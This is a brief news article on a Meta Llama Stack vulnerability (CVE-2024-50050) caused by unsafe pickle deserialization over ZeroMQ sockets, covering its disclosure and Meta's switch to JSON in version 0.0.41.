Meta’s Llama Framework Vulnerability Poses Remote Code Execution Threats to AI Systems

Published:

Critical Security Flaw Discovered in Meta’s Llama LLM Framework: Implications and Responses

High-Severity Vulnerability Discovered in Meta’s Llama Model Framework

In a startling revelation, a significant security flaw has been unearthed in Meta’s Llama large language model (LLM) framework, potentially granting attackers the ability to execute arbitrary code on compromised systems. Identified as CVE-2024-50050, this vulnerability presents a CVSS score of 6.3, although supply chain security firm Snyk has classified it as critical, assigning a score of 9.3.

The vulnerability is rooted in the Llama Stack component, which facilitates API interfaces for AI applications. According to Oligo Security researcher Avi Lumelsky, the flaw stems from the unsafe deserialization of untrusted data. "Attackers can exploit this by sending crafted malicious objects to the socket, enabling them to execute arbitrary code," Lumelsky explained.

The issue particularly affects the reference Python Inference API implementation, which automatically deserializes Python objects using the notoriously risky pickle format. With exposed ZeroMQ sockets, it opens up avenues for attackers to launch devastating cyber assaults.

Meta responded to the threat after a responsible disclosure on September 24, 2024, implementing a fix on October 10 in version 0.0.41. The tech giant switched from the pickle format to JSON for socket communication, effectively mitigating the remote code execution risk.

This revelation follows a recent spate of security concerns in AI frameworks. A flaw in OpenAI’s ChatGPT crawler, for instance, has been disclosed, posing similar risks of distributed denial-of-service (DDoS) attacks.

As AI technology evolves, so does the complexity and sophistication of associated cyber threats, raising alarms among cybersecurity experts. Deep Instinct researcher Mark Vaitzman emphasized that while the nature of threats is evolving with AI, the foundational risks remain, calling for vigilant security measures across platforms.

Related articles

Recent articles